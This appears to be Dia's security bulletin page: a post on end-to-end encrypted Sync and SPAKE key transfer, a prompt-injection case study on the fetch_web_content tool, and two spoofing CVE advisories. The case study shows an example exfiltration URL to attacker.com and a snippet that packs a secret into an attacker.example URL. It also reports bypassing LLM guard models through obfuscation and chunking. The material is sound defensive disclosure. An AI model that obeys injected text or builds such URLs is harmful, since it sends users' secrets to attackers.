Our latest updates on Security

Welcome to our Dia Security Bulletin. Here you’ll find the most up-to-date information on recent security fixes and security news for Dia. We get into the weeds a little here; if you have any questions, you can always reach us at security@thebrowser.company.

April 29, 2026

How Dia Sync keeps your data safe by design

On Thursday, April 9, 2026, we launched a much-anticipated feature in Dia: Sync. Here's how we shipped this feature securely.

TL;DR

Sync lets you access your bookmarks, tabs, and profiles (with more to come!) across multiple devices. Your sync data is end-to-end encrypted before it ever leaves your device — we can't read it, even though we store it on your behalf. This post walks through how we generate and protect your encryption keys, how we transfer them between devices without exposing them to our servers, and the design principle at the center of all of it: assume our servers are compromised, and ensure they still can't access your data.

If you haven't tried Sync yet, here's how to get started.

Our design principle: assume compromise, design for containment

Before getting into the technical details, it's worth explaining the mental model we used when designing Sync's security.

We asked ourselves a simple question: if our own servers were compromised and fully controlled by an attacker... could they access your synced data?

The answer had to be "no."

Every design decision in Sync flows from that constraint. The encryption happens on your device. The keys stay on your devices. The server stores ciphertext it cannot decrypt. When we needed to transfer keys between devices, we designed the transfer so that even a compromised server sitting in the middle can't extract the key.

This is the same philosophy we applied to fetch_web_content and other Dia capabilities. Don't just try to prevent bad outcomes. Design so they're structurally infeasible.

Your encryption key

When you enable Sync, Dia generates a random 256-bit encryption seed on your device. We call this your sync key. It's the root of all Sync encryption, and never leaves your devices.

From that seed, we use HKDF-SHA256 to derive two keys:

  1. A 256-bit AES key - this is the encryption key. Before any sync data leaves your device, it's encrypted with this key via AES-256-GCM. Our servers only ever receive ciphertext they cannot decrypt.
  2. An Ed25519 keypair - this is the authentication key. The server uses the public half to verify that sync operations are coming from a device that holds your sync key. Even if your Dia account is compromised, your synced data can’t be accessed or modified without one of your syncing devices.

Both keys are derived from your sync key, and neither the sync key nor its derived keys are ever shared with our servers. Only your devices have the capacity to decrypt or modify your synced data.
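The derivation can be sketched with nothing but the standard library. Below is a minimal HKDF-SHA256 implementation (per RFC 5869) deriving the two keys from a sync key; the `info` labels are illustrative placeholders, not Dia's actual values, and this is a sketch rather than Dia's implementation:

```python
import hashlib
import hmac
import os

def hkdf_sha256(ikm: bytes, info: bytes, length: int = 32) -> bytes:
    """HKDF (RFC 5869) with SHA-256: extract with an empty salt, then expand."""
    prk = hmac.new(b"\x00" * 32, ikm, hashlib.sha256).digest()
    okm, block, counter = b"", b"", 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        okm += block
        counter += 1
    return okm[:length]

# The 256-bit sync key is generated once, on-device, and never uploaded.
sync_key = os.urandom(32)

# Distinct "info" labels keep the derived keys cryptographically independent.
# (The label strings are hypothetical, for illustration only.)
aes_key = hkdf_sha256(sync_key, b"dia-sync/encryption")  # feeds AES-256-GCM
auth_seed = hkdf_sha256(sync_key, b"dia-sync/auth")      # seeds the Ed25519 keypair
```

Because HKDF is deterministic, any device holding the sync key re-derives the exact same keys; nothing derived ever needs to touch the server.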

We also use the BIP39 protocol to convert your sync key into a 24-word recovery phrase. This gives you a human-readable backup of your key that's much easier to type than the raw key itself.
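The entropy-to-words mapping in BIP39 is simple enough to show directly: append an 8-bit checksum to the 256 bits of entropy, then cut the resulting 264 bits into 24 groups of 11 bits, each indexing a 2048-word list. A sketch of the index computation (the final word lookup against the standard English wordlist is left as a comment):

```python
import hashlib
import os

def bip39_word_indices(entropy: bytes) -> list[int]:
    """Map 256 bits of entropy to 24 word indices, per BIP39:
    checksum = first 8 bits of SHA-256(entropy), giving 264 bits total,
    split into 24 groups of 11 bits (each in the range 0..2047)."""
    assert len(entropy) == 32
    checksum = hashlib.sha256(entropy).digest()[0]
    bits = (int.from_bytes(entropy, "big") << 8) | checksum
    return [(bits >> (11 * i)) & 0x7FF for i in reversed(range(24))]

indices = bip39_word_indices(os.urandom(32))
# Each index selects one word from the standard 2048-word English list,
# e.g. phrase = " ".join(wordlist[i] for i in indices)
```

The checksum is why a mistyped recovery phrase is almost always detected instead of silently producing the wrong key.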

Adding new devices is the hard part

Encrypting data is the straightforward piece. The challenge is: how do you get your sync key onto a new device without exposing it to our servers?

Existing approaches all have tradeoffs for a desktop browser:

  • QR Codes - Encrypted messengers like Signal use this: show a QR code on one device, scan it with the other. But Dia runs on laptops and desktops. Holding one laptop screen up to another is awkward, and desktops don't always have a camera. QR transfers work best with a phone.
  • Passwords - Services like iCloud and password managers let you pick a password that derives the encryption key, but you already have a Dia password. Enterprises often use SSO without a password at all. We didn't want to introduce a second password just for Sync.
  • Recovery phrases - Many services use these as a backup (Sync included), but they're cumbersome as a primary transfer method.

All three approaches transfer the key out of band, without touching the server. We started looking for a way to transfer keys through our server, between your devices, in a manner where our server could not eavesdrop. In other words: secure key transfer over an untrusted channel.

The solution: SPAKE key exchange

We landed on Symmetric Password-Authenticated Key Exchange (SPAKE), facilitated by our server, to pass the sync key between two devices in your account.

SPAKE is a special kind of key exchange. Like standard Elliptic Curve Diffie-Hellman, two parties exchange information across a server to compute a shared secret. But in SPAKE, the initial handshake itself is encrypted with a password both parties know beforehand. This means that any party in between (here, Dia's servers) would have to guess the password before they could attempt to insert themselves into the key exchange.

Here's how it works in practice:

When you add a new device, your existing device displays a device transfer code - a short alphanumeric code you type into your new device. This is the SPAKE password. You pass it between devices yourself; the server never sees it.

If a compromised server wanted to perform a man-in-the-middle attack, it would have to guess this code. But here's the critical detail: only your devices can validate whether a guess is correct. The server has to send its guesses to the client, and we've configured Dia to allow only three wrong attempts before the code is rotated. Since transfer codes are 6 characters drawn from digits and uppercase letters, that's roughly 3 chances in 2 billion.

Once the transfer completes, the code is discarded and never reused.
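The arithmetic behind those odds is worth a quick sanity check. The code generator below is a hypothetical stand-in for Dia's actual format, but the keyspace math matches the 6-character, 36-symbol alphabet described above:

```python
import secrets
import string

ALPHABET = string.ascii_uppercase + string.digits  # 36 possible characters
CODE_LEN = 6
KEYSPACE = len(ALPHABET) ** CODE_LEN               # 36**6 = 2,176,782,336

def transfer_code() -> str:
    """Generate a random 6-character code (format assumed, for illustration)."""
    return "".join(secrets.choice(ALPHABET) for _ in range(CODE_LEN))

# With at most 3 online guesses before the code rotates, an attacker's odds:
attack_odds = 3 / KEYSPACE   # ~1.4e-9, i.e. "3 chances in roughly 2.2 billion"
```

Note the use of `secrets` rather than `random`: transfer codes must come from a cryptographically secure generator, or the keyspace math above is meaningless.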

Your data, your control

You can disable Sync at any time. And when you do, your encrypted data is permanently deleted from our servers. No retention period, no archival copy. It's gone.

If you delete your Dia account entirely, all associated data (including sync data) is deleted from our servers within 30 days.

Our broader design principle

With Sync, we're not just guaranteeing "we don't read your data." We can't read your data, by design. A compromised server can refuse to sync your data (a denial-of-service), but it cannot read it, cannot modify it undetected, and cannot intercept your keys during device transfer.

This is the approach we take across all of Dia's security architecture: assume compromise, design for containment. We don't rely on our servers staying safe. We build so that even if they don't, your data does.

Sync's encryption, key exchange, and server components were independently assessed by a third-party security firm before launch.

For more on how Dia handles your data, see our Privacy page and Security FAQ.

February 12, 2026

Security Story of fetch_web_content

How we built a powerful feature, discovered it could be exploited, and rebuilt it from the ground up with security at its core.

TL;DR

This post tells the story of fetch_web_content, a tool that lets Dia retrieve information from the web on your behalf. We built it, discovered it could be exploited for data exfiltration via prompt injection, spent months trying to secure it with detection-based approaches, and ultimately concluded that detection wasn't enough. We made the difficult decision to remove the feature before Dia's public beta in June 2025. Two months later, we brought it back—rebuilt from the ground up with architectural controls that remain secure even when prompt injection occurs.

This is a story about what it looks like to take AI security seriously: acknowledging when something isn't working, having the discipline to unship, and investing in solutions that address root causes rather than symptoms. It's also just one example—Dia's security architecture includes many layers of protection, each designed to address different threat vectors. This post is a deep dive into one of them.

What is fetch_web_content?

fetch_web_content is one of Dia's most versatile tools. It allows the assistant to retrieve information from URLs—pulling in web pages, documentation, articles, and other online resources to provide richer, more informed responses.

When a user asks Dia to summarize a link, check the status of a service, or pull in context from the web, fetch_web_content makes that possible. It's the kind of capability that transforms an AI assistant from a static knowledge base into a dynamic, connected helper.

We were excited to ship it. It was one of the first tools we built—present in Dia's earliest internal builds back in January 2025.

Then we broke it.

The Discovery: Data Exfiltration via URL Encoding

During security testing, our team uncovered a serious vulnerability class. The attack vector was elegant in its simplicity and terrifying in its implications.

Here's how it works:

URLs can encode arbitrary data. A URL like https://attacker.com/log?data=secret123 transmits secret123 to attacker.com when fetched.

LLMs are eager to follow instructions. If an attacker can inject malicious instructions into content the model processes (via prompt injection), they can instruct the model to:

  1. Extract sensitive information from the user's context
  2. Encode that data into a URL parameter
  3. Call fetch_web_content on that URL

The fetch itself becomes the exfiltration. The moment Dia makes that request, the sensitive data—passwords, API keys, private conversations, whatever was in context—gets transmitted to the attacker's server in the request logs.

No fancy exploits. No zero-days. Just the normal, intended behavior of a URL fetch, exploited through prompt injection.
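To make the mechanics concrete, here is the entire shape of the attack in a few lines of Python. The domain and secret are made up; the point is that the "exploit" is just ordinary URL construction:

```python
from urllib.parse import urlencode, urlparse, parse_qs

# A secret the injected instructions tell the model to pull from context:
secret = "sk-live-EXAMPLE-KEY"  # hypothetical value, for illustration

# The model is coaxed into building a URL that smuggles the secret in a parameter:
url = "https://attacker.example/log?" + urlencode({"data": secret})

# Nothing further is needed: the moment the browser fetches this URL,
# the secret lands in attacker.example's access logs.
leaked = parse_qs(urlparse(url).query)["data"][0]
```

There is no malformed input and no protocol violation anywhere in that snippet, which is exactly why signature-style defenses have nothing to latch onto.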

The Attempt: Can We Detect and Block This?

Once we understood the shape of the attack, our first instinct was straightforward: keep the feature, but get really good at spotting the bad cases.

That led us down the detection path. We tried a bunch of variants of the same basic idea: let the model decide what to fetch, then add checks to catch exfiltration before the request goes out.

Here’s what we tested through the first half of 2025:

  • URL allowlisting and blocklisting — This sounds reasonable until you remember how cheap domains are. Attackers can register new domains instantly, and even legitimate sites can be turned into collection endpoints.
  • Pattern detection for sensitive data in URLs — We looked for things that “seem like secrets” (tokens, keys, long base64-ish blobs, etc.). The false positive rate was brutal, because real-world URLs are full of encoded parameters. And in the cases that mattered most, attackers could just transform or split the data until it no longer matched.
  • Heuristic analysis of URL structure — We tried scoring requests based on URL shape: parameter length, entropy, suspicious parameter names, unusual encoding patterns, and so on. This helped catch the obvious stuff, but sophisticated attackers would have no trouble producing URLs that looked completely normal.
  • Output filtering — Another thought was “even if the model tries to exfiltrate, we’ll catch it on the way out.” But the model can obfuscate data before encoding it, or distribute it across multiple innocuous-looking requests.
  • Prompt-based guardrails — We also tried the standard "tell the model not to do that" approach. The problem is prompt injection is the attack. If your defense relies on the model consistently ignoring malicious instructions, you're betting against the one thing the attacker is best positioned to influence.
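To illustrate why the heuristic approaches struggled, here is roughly what a "looks like a secret" entropy check amounts to. This is a simplified sketch, not our production code, and the example strings are invented:

```python
import math
from collections import Counter

def entropy_bits_per_char(s: str) -> float:
    """Shannon entropy of a string: a crude 'does this look like a secret?' score."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

# A legitimate base64-style tracking parameter and a re-encoded secret occupy
# the same entropy range, so any threshold either blocks real traffic or lets
# an attacker slip under it by transforming or chunking the payload.
session_param = "dXRtX2NvbnRlbnQ9c3ByaW5n"  # an ordinary encoded parameter
payload = "c3RvbGVuLXNlY3JldC1kYXRh"        # exfiltrated data, re-encoded
```

Both strings score as "high entropy," and an attacker who knows the threshold can always re-encode to land just below it. That asymmetry is the core problem with every detector in the list above.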

We also explored a natural escalation of these ideas: using LLMs themselves as part of the defense—either to review the page context for signs of prompt injection, or to inspect the generated URL and decide whether it looked like exfiltration.

On paper, this is appealing. Models can reason about intent, generalize beyond fixed patterns, and catch things that would slip past regex and heuristics.

In practice, it didn’t change the outcome. Our team was able to bypass every LLM-based detection mechanism we tried—regardless of model size—using the same playbook attackers use everywhere else: obfuscation, indirection, chunking, encoding, and “make it look normal” transformations. Even when the guard model sometimes flagged attacks, it wasn’t consistent enough to be a security boundary we could actually rely on.

We kept circling back to the same uncomfortable conclusion: we were trying to tell the difference between a legitimate fetch and a malicious fetch after the model had already decided to make the request—and the adversary could shape both the content and the model’s behavior.

Detection-based security is not sufficient when the attacker controls the input to your detector and can influence the detector's ruleset.

What About Asking the User?

There's one mitigation we haven't mentioned yet: human-in-the-loop confirmation. What if we just asked the user before fetching each URL?

This sounds reasonable. It's a pattern users have seen before—banks, social networks, and other sites show similar prompts when you click an external link. But we concluded that humans couldn't effectively be in the loop here, for several reasons:

The risk profile is completely different. Those familiar prompts warn you that you're leaving a trusted site—not that your data might be stolen immediately by proceeding. When a bank shows "You are now leaving Example Bank," the worst case is usually landing on a phishing page you can recognize and close. Our prompt would need to communicate something much more severe: "If you approve this, sensitive data from your context could be transmitted to an attacker." Users aren't trained to think about URL fetches this way, and we couldn't expect them to understand how novel this situation is.

It's a terrible user experience. Dia often fetches multiple URLs to answer a single question—pulling in documentation, checking references, gathering context. Prompting for each fetch would be exhausting and would undermine the core value of having an AI assistant that can work with the web on your behalf.

Even "allowlist this domain" doesn't work. You might think users could approve trusted domains once and be done with it. But most major domains have open redirects—URL endpoints that will redirect to any destination. Allowlist youtube.com, and an attacker can use YouTube's well-known open redirect to bounce data to their own server. The allowlist becomes a bypass, not a protection.

The bottom line: we couldn't make users the security boundary. The solution had to be architectural.

The Decision: Unlaunch

By June 2025, we were preparing to launch Dia's public beta. We had a decision to make.

This wasn't a close call. We had a feature that could be exploited to exfiltrate user data, and we couldn't reliably prevent it.

We unlaunched fetch_web_content. It didn't ship with the beta.

Shipping fast matters. Shipping secure matters more.

The Rebuild: Secure by Design

We went back to first principles. Instead of asking "how do we detect malicious fetches?" we asked "how do we make this class of malicious fetches impossible in practice?"

The answer required rethinking the feature's architecture entirely:

URL Provenance

By design, fetch_web_content enforces provenance—a clear chain of custody showing where a URL came from. URLs that appear in the user's browsing context, their tabs, their messages? Those have provenance. URLs the model generates from whole cloth, potentially stuffed with exfiltrated data? Those don't.

If a URL can't demonstrate where it came from, fetch_web_content is designed to reject it.

URLs with provenance (allowed):

  • A link the user clicks or pastes—"Summarize this article" with a URL from their clipboard or an open tab
  • A link visible in the user's browsing context—a URL from a webpage they're actively viewing
  • A link from a message or email—a URL that appeared in a Slack message, email, or chat the user shared with Dia
  • A link from a document the user opened—a URL embedded in a PDF, Google Doc, or Notion page the user explicitly gave Dia access to

URLs without provenance (blocked):

  • A URL the model constructs on its own, with no source anywhere in the user's context
  • A URL assembled from data in the conversation (the exfiltration pattern described above)

Provenance isn't about whether a URL looks safe—it's about whether we can trace it back to something the user actually provided or intended to access. The model can choose which URLs to fetch, but provenance enforcement dramatically narrows the set of URLs it can access to those rooted in the user's context.
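In code, the core of the idea reduces to a check like this. It is a deliberately simplified sketch: Dia's actual provenance tracking is richer than an exact-match set, and the URLs and function names here are hypothetical:

```python
from urllib.parse import urlencode

def has_provenance(url: str, context_urls: set[str]) -> bool:
    """Allow a fetch only when the URL was observed in user-provided context
    (open tabs, clipboard contents, shared messages or documents)."""
    return url in context_urls

# URLs collected from what the user actually provided or is viewing:
context_urls = {
    "https://example.com/article",     # pasted by the user
    "https://docs.example.com/guide",  # visible in an open tab
}

# A model-constructed URL carrying encoded data has no source in context:
crafted = "https://attacker.example/log?" + urlencode({"data": "c2VjcmV0"})
```

The crucial property is that the check consults only state the attacker cannot write to through prompt injection: what the user opened, pasted, or shared, not what the model generated.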

Assume Prompt Injection Will Happen

This is the key mental shift. We stopped designing for a world where we successfully block all prompt injection. We started designing for a world where prompt injection happens, and the attacker still can’t get the results they want.

When an attacker injects malicious instructions, Dia might follow them. It might even try to construct a malicious URL. But when it calls fetch_web_content, the URL is checked against its provenance policy. Attacker-constructed URLs are rejected before data leaves the device.

Defense in Depth

URL provenance is our primary control, but it's not our only one. We've layered additional safeguards throughout the system. The details are less important than the principle: no single control failing should compromise user security.

The Result

A couple of months later, fetch_web_content came back. It's just as useful as before—users can ask Dia to pull in web content, summarize articles, and work with online resources.

But now, even if an attacker achieves prompt injection, this attack vector is effectively closed off.

To be clear: this doesn't mean fetch_web_content is immune to all misuse, or that prompt injection is "solved." Other attack patterns require other defenses. What we've done is architecturally close off this specific threat—data exfiltration via URL encoding—so that even a successful prompt injection can't exploit it.

Why This Matters

The security community has been sounding the alarm on prompt injection for years. And they're right—it's a hard problem without a clean solution. You can't consistently and robustly detect all prompt injections, which means you can't fully trust model outputs.

But you can design systems that limit blast radius even when prompt injection succeeds.

This is the path forward for AI security: assume compromise, design for containment.

fetch_web_content is one tool, and URL provenance is one control. Dia's broader security posture includes many other systems—each with its own story of iteration, testing, and refinement. We'll share more of those stories over time.

Join Us

Building AI agents that can safely interact with the real world is still a frontier problem. The attacks are evolving, the tooling is immature, and the cost of getting it wrong is real user harm.

That’s why our Trust and Safety team is growing. If you’re excited about AI security—agent containment, prompt injection defense, tool safety, sandboxing, provenance, and defense-in-depth—and you want to help build Dia’s AI capabilities the right way, we’d love to talk.

We’re hiring.

January 15, 2026

CVE-2025-15032: Increased Spoofing risk; custom new window missing about:blank

  • Summary: Increased spoofing risk in affected macOS versions of Dia.
  • CVE ID: CVE-2025-15032
  • Advisory Release Date: Fri, Jan 16, 2026
  • Affected Version: Dia version <1.9.0
  • Severity: High

Details

With this issue, an attacker-controlled site could open a new custom-sized window in which the URL bar did not display about:blank. This could allow an attacker to make the window’s title appear like a trusted domain and mislead users about what site they were on.

In Dia versions ≥1.9.0, about:blank is displayed in the URL bar in these scenarios, which makes spoof attempts more visible.

Severity

The Browser Company rates this issue High with a CVSS v3.1 base score of 7.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). This reflects our internal assessment—please evaluate applicability within your environment.

Affected Versions

Dia on macOS versions <1.9.0

What do I need to do?

Update Dia to the latest available version. Any version 1.9.0 or newer contains the fix.

Credit

The Browser Company thanks frozzipies and novemberelang for reporting this issue through our vulnerability rewards program.

November 20, 2025

CVE-2025-13132: Increased Spoof Risk; Missing full screen toast

  • Summary: Increased spoofing risk in affected macOS versions of Dia.
  • CVE ID: CVE-2025-13132
  • Advisory Release Date: Fri, Nov 21, 2025
  • Affected Versions: Dia versions <1.6
  • Severity: High

Details

This vulnerability allowed a site to enter fullscreen without the fullscreen notification (toast) appearing. Without this notification, users could be misled about what site they were on if a malicious site rendered a fake UI (like a fake address bar).

In Dia versions ≥1.6, the fullscreen notification (toast) is enabled in all scenarios, informing users of the transition to fullscreen and making spoof attempts visible.

Severity

The Browser Company rates this issue High with a CVSS v3.1 base score of 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). This reflects our internal assessment—please evaluate applicability within your environment.

Affected Versions

Dia on macOS versions <1.6

What do I need to do?

Update Dia to the latest available version. Any version 1.6 or newer contains the fix.

Credit

The Browser Company thanks @frozzipies for reporting this issue through our vulnerability rewards program.

October 15, 2025

Introducing Dia’s Security Bulletin

Hi there, Cory here! I’m the Head of Security at The Browser Company. With Dia now generally available, the security team is introducing Dia’s Security Bulletin page.

Security has been at the core of how we built Dia. Being an AI Browser introduces novel security considerations—from prompt injection and model supply chain risks to client hardening and safe integrations. We’re committed to transparent, actionable communication when there’s something users or admins need to do.

This page will host:

  • Advisories: Clear guidance on vulnerabilities affecting Dia and steps to remediate.
  • CVE Notices: Disclosures aligned with our CNA policy and assignment process.
  • Security-impacting Release Notes: Highlights of patches, mitigations, and hardening work.
  • Enterprise Updates: Admin controls, policy changes, and audit-related information.

Publishing cadence will be event-driven: when there’s user or admin action to take, you’ll see it here first, with severity, affected versions, and fix paths.

If you believe you’ve found a security issue, please report it through our bug bounty program or responsible disclosure channels listed on the Dia Security Center. Thank you for helping us keep users safe.